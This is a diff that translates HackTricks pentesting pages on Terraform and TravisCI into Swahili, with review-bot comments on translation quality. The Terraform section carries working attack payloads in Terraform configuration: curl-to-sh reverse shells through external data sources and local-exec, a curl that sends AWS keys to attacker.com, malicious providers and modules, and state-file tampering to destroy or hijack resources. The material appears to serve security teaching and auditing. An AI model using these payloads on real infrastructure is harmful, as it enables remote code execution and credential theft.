+Terraform inaunda na kusimamia rasilimali kwenye majukwaa ya wingu na huduma nyingine kupitia interfaces zao za programu za maombi (APIs). Watoa huduma wanaruhusu Terraform kufanya kazi na karibu jukwaa au huduma yoyote yenye API inayopatikana.
.png>)
-HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
+HashiCorp na jamii ya Terraform tayari wameandika **zaidi ya watoa huduma 1700** kusimamia maelfu ya aina tofauti za rasilimali na huduma, na nambari hii inaendelea kukua. Unaweza kupata watoa huduma wote wanaopatikana hadharani kwenye [Terraform Registry](https://registry.terraform.io/), ikiwa ni pamoja na Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, na mengine mengi.
-The core Terraform workflow consists of three stages:
+Mtiririko wa msingi wa Terraform unajumuisha hatua tatu:
-- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
-- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
-- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
+- **Write:** Unafafanua rasilimali, ambazo zinaweza kuwa kati ya watoa huduma na huduma mbalimbali za wingu. Kwa mfano, unaweza kuunda usanidi wa kupeleka programu kwenye mashine za virtual katika mtandao wa Virtual Private Cloud (VPC) pamoja na vikundi vya usalama na balancer ya mzigo.
+- **Plan:** Terraform inaunda mpango wa utekelezaji unaofafanua miundombinu itakayoundwa, kusasishwa, au kuharibiwa kulingana na miundombinu iliyopo na usanidi wako.
+- **Apply:** Kwa idhini, Terraform inatekeleza operesheni zilizopendekezwa kwa mpangilio sahihi, ikiheshimu utegemezi wowote wa rasilimali. Kwa mfano, ikiwa unasasisha mali za VPC na kubadilisha idadi ya mashine za virtual katika VPC hiyo, Terraform itaunda upya VPC kabla ya kupanua mashine za virtual.
.png>)
### Terraform Lab
-Just install terraform in your computer.
+Sakinisha terraform kwenye kompyuta yako.
-Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads).
+Hapa una [mwongozo](https://learn.hashicorp.com/tutorials/terraform/install-cli) na hapa una [njia bora ya kupakua terraform](https://www.terraform.io/downloads).
## RCE in Terraform
-Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**.
+Terraform **haina jukwaa linalofichua ukurasa wa wavuti au huduma ya mtandao** tunaweza kuhesabu, kwa hivyo, njia pekee ya kuathiri terraform ni **kuwa na uwezo wa kuongeza/kubadilisha faili za usanidi za terraform**.
-However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly.
+Hata hivyo, terraform ni **kipengele nyeti sana** kuathiri kwa sababu itakuwa na **ufikiaji wa kijasiri** kwa maeneo tofauti ili iweze kufanya kazi ipasavyo.
-The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**.
+Njia kuu kwa mshambuliaji kuwa na uwezo wa kuathiri mfumo ambapo terraform inafanya kazi ni **kuathiri hifadhi inayohifadhi usanidi wa terraform**, kwa sababu kwa wakati fulani wata **fasiriwa**.
-Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**:
+Kwa kweli, kuna suluhisho huko nje ambazo **zinafanya mpango wa terraform/kuomba kiotomatiki baada ya PR** kuundwa, kama **Atlantis**:
{{#ref}}
atlantis-security.md
{{#endref}}
-If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`.
+Ikiwa una uwezo wa kuathiri faili ya terraform kuna njia tofauti unaweza kufanya RCE wakati mtu anatekeleza `terraform plan` au `terraform apply`.
### Terraform plan
-Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`.
+Terraform plan ni **amri inayotumika zaidi** katika terraform na waendelezaji/misitu inayotumia terraform huipigia simu kila wakati, hivyo **njia rahisi ya kupata RCE** ni kuhakikisha unachafua faili ya usanidi wa terraform ambayo itatekeleza amri zisizo za kawaida katika `terraform plan`.
**Using an external provider**
-Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`.
-
-Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`:
+Terraform inatoa [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) ambayo inatoa njia ya kuunganishwa kati ya Terraform na programu za nje. Unaweza kutumia chanzo cha data `external` kuendesha msimbo wowote wakati wa `plan`.
+Kuingiza katika faili ya usanidi wa terraform kitu kama ifuatavyo kitatekeleza shell ya rev wakati wa kutekeleza `terraform plan`:
```javascript
data "external" "example" {
- program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
+program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
+**Kutumia mtoa huduma maalum**
-**Using a custom provider**
-
-An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
-
+Mshambuliaji anaweza kutuma [mtoa huduma maalum](https://learn.hashicorp.com/tutorials/terraform/provider-setup) kwenye [Terraform Registry](https://registry.terraform.io/) na kisha kuiongeza kwenye msimbo wa Terraform katika tawi la kipengele ([mfano kutoka hapa](https://alex.kaskaso.li/post/terraform-plan-rce)):
```javascript
- terraform {
- required_providers {
- evil = {
- source = "evil/evil"
- version = "1.0"
- }
- }
- }
+terraform {
+required_providers {
+evil = {
+source = "evil/evil"
+version = "1.0"
+}
+}
+}
provider "evil" {}
```
+Mtoa huduma hupakuliwa katika `init` na utaendesha msimbo mbaya wakati `plan` inatekelezwa
-The provider is downloaded in the `init` and will run the malicious code when `plan` is executed
+Unaweza kupata mfano katika [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
-You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
+**Kutumia rejeleo la nje**
-**Using an external reference**
-
-Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions:
-
-- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
+Chaguzi zote zilizotajwa ni muhimu lakini si za siri sana (ya pili ni ya siri zaidi lakini ngumu zaidi kuliko ya kwanza). Unaweza kufanya shambulio hili hata kwa njia **ya siri zaidi**, kwa kufuata mapendekezo haya:
+- Badala ya kuongeza rev shell moja kwa moja kwenye faili ya terraform, unaweza **kupakia rasilimali ya nje** ambayo ina rev shell:
```javascript
module "not_rev_shell" {
- source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
-
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
-- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+- Katika rasilimali ya nje, tumia kipengele cha **ref** kuficha **kodi ya terraform rev shell katika tawi** ndani ya repo, kitu kama: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
### Terraform Apply
-Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-You just need to make sure some payload like the following ones ends in the `main.tf` file:
-
+Terraform apply itatekelezwa ili kutekeleza mabadiliko yote, unaweza pia kuitumia vibaya kupata RCE kwa kuingiza **faili ya Terraform yenye** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
+Unahitaji tu kuhakikisha kuwa payload fulani kama ifuatavyo inamalizika katika faili ya `main.tf`:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
- provisioner "local-exec" {
- command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
- }
+provisioner "local-exec" {
+command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
- provisioner "local-exec" {
- command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
- }
+provisioner "local-exec" {
+command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+}
}
```
-
Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**.
## Secrets Dumps
You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like:
-
```json
output "dotoken" {
- value = nonsensitive(var.do_token)
+value = nonsensitive(var.do_token)
}
```
-
## Abusing Terraform State Files
-In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file:
+Katika hali ambapo una ufikiaji wa kuandika kwenye faili za hali za terraform lakini huwezi kubadilisha msimbo wa terraform, [**utafiti huu**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) unatoa chaguzi za kuvutia za kunufaika na faili hiyo:
### Deleting resources
-There are 2 ways to destroy resources:
+Kuna njia 2 za kuharibu rasilimali:
-1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
-
-Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
+1. **Weka rasilimali yenye jina la nasibu kwenye faili la hali ikielekeza kwenye rasilimali halisi ya kuharibu**
+Kwa sababu terraform itaona kwamba rasilimali hiyo haipaswi kuwepo, itaiharibu (ikifuatilia kitambulisho halisi cha rasilimali kilichotajwa). Mfano kutoka ukurasa wa awali:
```json
{
- "mode": "managed",
- "type": "aws_instance",
- "name": "example",
- "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
- "instances": [
- {
- "attributes": {
- "id": "i-1234567890abcdefg"
- }
- }
- ]
+"mode": "managed",
+"type": "aws_instance",
+"name": "example",
+"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
+"instances": [
+{
+"attributes": {
+"id": "i-1234567890abcdefg"
+}
+}
+]
},
```
+2. **Badilisha rasilimali ili kufuta kwa njia ambayo haiwezekani kuisasisha (hivyo itafutwa na kuundwa upya)**
-2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
-
-For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
+Kwa mfano la EC2, kubadilisha aina ya mfano ni ya kutosha kufanya terraform ifute na kuunda upya.
### RCE
-It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research:
-
+Pia inawezekana [kuunda mtoa huduma maalum](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) na kubadilisha tu mmoja wa watoa huduma katika faili ya hali ya terraform kwa yule mbaya au kuongeza rasilimali tupu na mtoa huduma mbaya. Mfano kutoka kwa utafiti wa awali:
```json
"resources": [
{
- "mode": "managed",
- "type": "scaffolding_example",
- "name": "example",
- "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
- "instances": [
+"mode": "managed",
+"type": "scaffolding_example",
+"name": "example",
+"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
+"instances": [
- ]
+]
},
```
-
### Replace blacklisted provider
-In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
-
+Katika hali unayokutana nayo ambapo `hashicorp/external` imewekwa kwenye orodha ya mablacklist, unaweza kuitekeleza tena `external` provider kwa kufanya yafuatayo. Kumbuka: Tunatumia fork ya external provider iliyochapishwa na https://registry.terraform.io/providers/nazarewk/external/latest. Unaweza kuchapisha fork yako mwenyewe au utekelezaji tena pia.
```terraform
terraform {
- required_providers {
- external = {
- source = "nazarewk/external"
- version = "3.0.0"
- }
- }
+required_providers {
+external = {
+source = "nazarewk/external"
+version = "3.0.0"
+}
+}
}
```
-
-Then you can use `external` as per normal.
-
+Kisha unaweza kutumia `external` kama kawaida.
```terraform
data "external" "example" {
- program = ["sh", "-c", "whoami"]
+program = ["sh", "-c", "whoami"]
}
```
-
-## Automatic Audit Tools
+## Zana za Ukaguzi wa Otomatiki
### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
-Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats.
-
-- **Features:**
- - Real-time scanning for security vulnerabilities and compliance issues.
- - Integration with version control systems (GitHub, GitLab, Bitbucket).
- - Automated fix pull requests.
- - Detailed remediation advice.
-- **Sign Up:** Create an account on [Snyk](https://snyk.io/).
+Snyk inatoa suluhisho kamili la skanning ya Infrastructure as Code (IaC) linalogundua udhaifu na mipangilio isiyo sahihi katika Terraform, CloudFormation, Kubernetes, na mifumo mingine ya IaC.
+- **Vipengele:**
+- Skanning ya wakati halisi kwa ajili ya udhaifu wa usalama na masuala ya ufuatiliaji.
+- Uunganisho na mifumo ya udhibiti wa toleo (GitHub, GitLab, Bitbucket).
+- Maombi ya kurekebisha yaliyotolewa kiotomatiki.
+- Ushauri wa kina wa kurekebisha.
+- **Jisajili:** Unda akaunti kwenye [Snyk](https://snyk.io/).
```bash
brew tap snyk/tap
brew install snyk
snyk auth
snyk iac test /path/to/terraform/code
```
-
### [Checkov](https://github.com/bridgecrewio/checkov)
-**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
+**Checkov** ni chombo cha uchambuzi wa msimbo wa statiki kwa miundombinu kama msimbo (IaC) na pia chombo cha uchambuzi wa muundo wa programu (SCA) kwa picha na pakiti za chanzo wazi.
-It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning.
-
-It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
+Inachanganua miundombinu ya wingu iliyotolewa kwa kutumia [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), au [OpenTofu](https://opentofu.org/) na kugundua usalama na makosa ya kufuata sheria kwa kutumia uchambuzi wa msingi wa grafu.
+Inafanya [Uchambuzi wa Muundo wa Programu (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) ambayo ni uchambuzi wa pakiti za chanzo wazi na picha kwa ajili ya Uthibitisho wa Hatari na Ufunuo wa Pamoja (CVEs).
```bash
pip install checkov
checkov -d /path/to/folder
```
-
### [terraform-compliance](https://github.com/terraform-compliance/cli)
-From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
+From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` ni mfumo wa majaribio mwepesi, unaolenga usalama na ufuatiliaji wa sheria dhidi ya terraform ili kuwezesha uwezo wa majaribio hasi kwa miundombinu yako kama msimbo.
-- **compliance:** Ensure the implemented code is following security standards, your own custom standards
-- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ?
-- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/)
-- **pre-deploy:** it validates your code before it is deployed
-- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated.
-- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible.
+- **compliance:** Hakikisha kwamba msimbo ulioanzishwa unafuata viwango vya usalama, viwango vyako vya kawaida
+- **behaviour driven development:** Tuna BDD kwa karibu kila kitu, kwa nini isiwe kwa IaC?
+- **portable:** sakinisha tu kutoka `pip` au uendeshe kupitia `docker`. Tazama [Installation](https://terraform-compliance.com/pages/installation/)
+- **pre-deploy:** inathibitisha msimbo wako kabla ya kupelekwa
+- **easy to integrate:** inaweza kukimbia katika mchakato wako (au katika git hooks) ili kuhakikisha kwamba mawasilisho yote yamehakikishwa.
+- **segregation of duty:** unaweza kuweka majaribio yako katika hazina tofauti ambapo timu tofauti inawajibika.
> [!NOTE]
-> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool.
-
+> Kwa bahati mbaya ikiwa msimbo unatumia baadhi ya watoa huduma ambao huna ufikiaji nao huwezi kufanya `terraform plan` na kuendesha chombo hiki.
```bash
pip install terraform-compliance
terraform plan -out=plan.out
terraform-compliance -f /path/to/folder
```
-
### [tfsec](https://github.com/aquasecurity/tfsec)
-From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
-
-- āļø Checks for misconfigurations across all major (and some minor) cloud providers
-- ā Hundreds of built-in rules
-- šŖ Scans modules (local and remote)
-- ā Evaluates HCL expressions as well as literal values
-- āŖļø Evaluates Terraform functions e.g. `concat()`
-- š Evaluates relationships between Terraform resources
-- š§° Compatible with the Terraform CDK
-- š Applies (and embellishes) user-defined Rego policies
-- š Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
-- š ļø Configurable (via CLI flags and/or config file)
-- ā” Very fast, capable of quickly scanning huge repositories
+From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec inatumia uchambuzi wa statiki wa msimbo wako wa terraform ili kugundua uwezekano wa makosa ya usanidi.
+- āļø Inakagua makosa ya usanidi katika watoa huduma wote wakuu (na wengine wadogo)
+- ā Mamia ya sheria zilizojengwa ndani
+- šŖ Inachunguza moduli (za ndani na za mbali)
+- ā Inakadiria maelezo ya HCL pamoja na thamani halisi
+- āŖļø Inakadiria kazi za Terraform mfano `concat()`
+- š Inakadiria uhusiano kati ya rasilimali za Terraform
+- š§° Inafaa na Terraform CDK
+- š Inatumia (na kuimarisha) sera za Rego zilizofafanuliwa na mtumiaji
+- š Inasaidia muundo mbalimbali wa matokeo: nzuri (ya default), JSON, SARIF, CSV, CheckStyle, JUnit, maandiko, Gif.
+- š ļø Inaweza kubadilishwa (kupitia bendera za CLI na/au faili ya usanidi)
+- ā” Haraka sana, ina uwezo wa kuchunguza haraka hifadhi kubwa
```bash
brew install tfsec
tfsec /path/to/folder
```
-
### [KICKS](https://github.com/Checkmarx/kics)
-Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx.
-
-**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project.
+Pata udhaifu wa usalama, masuala ya ulinganifu, na makosa ya usanidi wa miundombinu mapema katika mzunguko wa maendeleo wa miundombinu yako kama msimbo kwa kutumia **KICS** kutoka Checkmarx.
+**KICS** inasimama kwa **K**uendelea **I**miundombinu kama **C**ode **S**alama, ni chanzo wazi na ni lazima kuwa nacho kwa mradi wowote wa wingu asilia.
```bash
docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
```
-
### [Terrascan](https://github.com/tenable/terrascan)
-From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:
-
-- Seamlessly scan infrastructure as code for misconfigurations.
-- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture.
-- Detect security vulnerabilities and compliance violations.
-- Mitigate risks before provisioning cloud native infrastructure.
-- Offers flexibility to run locally or integrate with your CI\CD.
+Kutoka kwa [**docs**](https://github.com/tenable/terrascan): Terrascan ni mchambuzi wa msimbo wa statiki kwa Miundombinu kama Msimbo. Terrascan inakuwezesha:
+- Kuchunguza miundombinu kama msimbo kwa makosa ya usanidi bila shida.
+- Kufuatilia miundombinu ya wingu iliyotolewa kwa mabadiliko ya usanidi yanayoleta mabadiliko ya hali, na inaruhusu kurudi kwenye hali salama.
+- Kugundua udhaifu wa usalama na ukiukaji wa kufuata.
+- Kupunguza hatari kabla ya kutoa miundombinu asilia ya wingu.
+- Inatoa kubadilika kukimbia kwa ndani au kuungana na CI\CD yako.
```bash
brew install terrascan
```
-
-## References
+## Marejeo
- [Atlantis Security](atlantis-security.md)
- [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
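Review bot: every translated code line in this hunk loses its leading indentation (the `+program = [...]` line in the `data "external"` block, the `required_providers` nesting, both `provisioner "local-exec"` blocks, the `output "dotoken"` body and both state-file JSON fragments); HCL and JSON still parse without it, but the nesting is now unreadable, so restore the original indentation and only change the text. The same edit also drops the blank lines that separated paragraphs, which changes the rendered structure: `Mtoa huduma hupakuliwa...`, `Unaweza kupata mfano...` and the bold `**Kutumia rejeleo la nje**` heading now render as one paragraph, the explanatory sentences after items `1.` and `2.` under "Deleting resources" become lazy continuations of those list items, and the Snyk feature bullets, which were indented under `- **Vipengele:**`, are flattened into sibling bullets. Three sentences were left untranslated as unchanged context (`You can find the rev shell code in ...`, `Follow the **suggestions from the previous technique** ...`, `You can have **secret values used by terraform dumped** ...`), and `From the [**docs**]` stays English in the terraform-compliance and tfsec paragraphs while it is rendered `Kutoka kwa` for Terrascan. Headings are also translated inconsistently (`## Zana za Ukaguzi wa Otomatiki` and `## Marejeo`, but `## RCE in Terraform`, `### Terraform Apply`, `## Secrets Dumps` stay English), and renaming `## References` changes its anchor. Finally, the emoji at the start of each tfsec feature bullet is mojibake in the added lines as well as the removed ones; re-encode them as UTF-8 or drop them rather than carrying the corruption forward.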
@@ -310,7 +280,3 @@ brew install terrascan
- [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/todo.md b/src/pentesting-ci-cd/todo.md
index 63a3bb5c8..8d5b20e54 100644
--- a/src/pentesting-ci-cd/todo.md
+++ b/src/pentesting-ci-cd/todo.md
@@ -2,7 +2,7 @@
{{#include ../banners/hacktricks-training.md}}
-Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
+Github PRs zinakaribishwa zikielezea jinsi ya (kutumia vibaya) hizo platforms kutoka kwa mtazamo wa mshambuliaji
- Drone
- TeamCity
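Review bot: since this line is being rewritten anyway, `Github` should read `GitHub`, and `(kutumia vibaya)` keeps only the "abuse" half of the source's `(ab)use`; `jinsi ya kutumia (vibaya) majukwaa hayo` preserves the intended double meaning and translates `platforms`, which is otherwise left in English mid-sentence.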
@@ -11,10 +11,6 @@ Github PRs are welcome explaining how to (ab)use those platforms from an attacke
- Rancher
- Mesosphere
- Radicle
-- Any other CI/CD platform...
+- Jukwaa lolote lingine la CI/CD...
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/travisci-security/README.md b/src/pentesting-ci-cd/travisci-security/README.md
index cff623392..f17d29b9c 100644
--- a/src/pentesting-ci-cd/travisci-security/README.md
+++ b/src/pentesting-ci-cd/travisci-security/README.md
@@ -4,7 +4,7 @@
## What is TravisCI
-**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**.
+**Travis CI** ni huduma ya **kuendelea kuunganisha** iliyohifadhiwa au kwenye **premises** inayotumika kujenga na kujaribu miradi ya programu iliyohifadhiwa kwenye **jukwaa tofauti za git**.
{{#ref}}
basic-travisci-information.md
@@ -14,48 +14,48 @@ basic-travisci-information.md
### Triggers
-To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
+Ili kuanzisha shambulio, kwanza unahitaji kujua jinsi ya kuanzisha ujenzi. Kwa kawaida, TravisCI itafanya **kuanzisha ujenzi kwenye push na pull requests**:
.png>)
#### Cron Jobs
-If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build:
+Ikiwa una ufikiaji wa programu ya wavuti, unaweza **kweka crons kuendesha ujenzi**, hii inaweza kuwa muhimu kwa kudumu au kuanzisha ujenzi:
.png>)
> [!NOTE]
-> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
+> Inaonekana haiwezekani kuweka crons ndani ya `.travis.yml` kulingana na [hii](https://github.com/travis-ci/travis-ci/issues/9162).
### Third Party PR
-TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
+TravisCI kwa kawaida inazima kushiriki mabadiliko ya mazingira na PRs zinazotoka kwa wahusika wengine, lakini mtu anaweza kuweza kuziwasha na kisha unaweza kuunda PRs kwa repo na kuhamasisha siri:
.png>)
### Dumping Secrets
-As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines).
+Kama ilivyoelezwa kwenye ukurasa wa [**basic information**](basic-travisci-information.md), kuna aina 2 za siri. **Siri za Mabadiliko ya Mazingira** (ambazo ziko kwenye ukurasa wa wavuti) na **siri za kawaida zilizofichwa**, ambazo zimehifadhiwa ndani ya faili ya `.travis.yml` kama base64 (kumbuka kwamba zote zikiwa zimehifadhiwa kwa siri zitakuwa kama mabadiliko ya mazingira kwenye mashine za mwisho).
-- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
-- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
-- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
+- Ili **kuhesabu siri** zilizowekwa kama **Mabadiliko ya Mazingira**, nenda kwenye **mipangilio** ya **mradi** na angalia orodha. Hata hivyo, kumbuka kwamba mabadiliko yote ya mazingira ya mradi yaliyowekwa hapa yataonekana unapofanya ujenzi.
+- Ili kuhesabu **siri za kawaida zilizofichwa**, bora unachoweza kufanya ni **kuangalia faili ya `.travis.yml`**.
